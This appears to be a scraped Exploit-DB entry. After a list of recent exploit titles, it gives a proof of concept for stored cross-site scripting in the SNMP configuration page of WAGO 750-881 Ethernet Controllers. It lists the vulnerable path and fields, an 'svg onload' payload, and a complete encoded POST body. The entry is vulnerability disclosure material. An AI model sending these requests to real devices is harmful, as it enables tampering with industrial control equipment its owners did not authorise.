9d143a6b42
22 changes to exploits/shellcodes Microsoft SQL Server Management Studio 17.9 - XML External Entity Injection Microsoft SQL Server Management Studio 17.9 - '.xel' XML External Entity Injection Microsoft SQL Server Management Studio 17.9 - '.xmla' XML External Entity Injection Wikidforum 2.20 - Cross-Site Scripting WAGO 750-881 01.09.18 - Cross-Site Scripting E-Registrasi Pencak Silat 18.10 - 'id_partai' SQL Injection jQuery-File-Upload 9.22.0 - Arbitrary File Upload Phoenix Contact WebVisit 6.40.00 - Password Disclosure HaPe PKH 1.1 - 'id' SQL Injection LUYA CMS 1.0.12 - Cross-Site Scripting Phoenix Contact WebVisit 2985725 - Authentication Bypass HaPe PKH 1.1 - Cross-Site Request Forgery (Update Admin) CAMALEON CMS 2.4 - Cross-Site Scripting HaPe PKH 1.1 - Arbitrary File Upload SugarCRM 6.5.26 - Cross-Site Scripting FluxBB < 1.5.6 - SQL Injection
18 lines
No EOL
1 KiB
Text
18 lines
No EOL
1 KiB
Text
# Exploit Title: WAGO 750-881 01.09.18 - Cross-Site Scripting
|
|
# Date: 2018-08-30
|
|
# Exploit Author: SecuNinja (@secuninja)
|
|
# Vendor Homepage: wago.com
|
|
# Version: 01.09.18(13) and earlier
|
|
# Affected Products: Ethernet Controller 750-881 - 01.09.18(13), 01.08.01 (10)
|
|
# CVE : N/A
|
|
|
|
# Description
|
|
# WAGO 750-881 Ethernet Controller devices, versions 01.09.18(13) and before,
|
|
# have XSS in the SNMP configuration via the webserv/cplcfg/snmp.ssi
|
|
# SNMP_DESC or SNMP_LOC_SNMP_CONT field.
|
|
|
|
# PoC
|
|
# http://ip.address/webserv/cplcfg/snmp.ssi FORM fields SNMP_DESC, SNMP_LOC_SNMP_CONT
|
|
# Exploit String "<svg/onload=alert(1)>
|
|
# http-post-data:
|
|
SNMP_DESC=%22%3E%3Csvg%2Fonload%3Dalert%281%29%3E&SNMP_LOC%22%3E%3Csvg%2Fonload%3Dalert%282%29%3E&SNMP_CONT=%22%3E%3Csvg%2Fonload%3Dalert%283%29%3E&SNMP_V1V2_ENABLE=SNMP_V1V2_ENABLE&SNMP1_LCOM_NAME=public&SNMP_TR_V1V2_1_IP=0.0.0.0&SNMP1_COM_NAME=public&SNMP_V1V2_TR1_VERSION=SNMP_V1V2_TR1_VERSION1&SNMP_TR_V1V2_2_IP=0.0.0.0&SNMP2_COM_NAME=public&SNMP_V1V2_TR2_VERSION=SNMP_V1V2_TR2_VERSION1&SUBMIT=SUBMIT |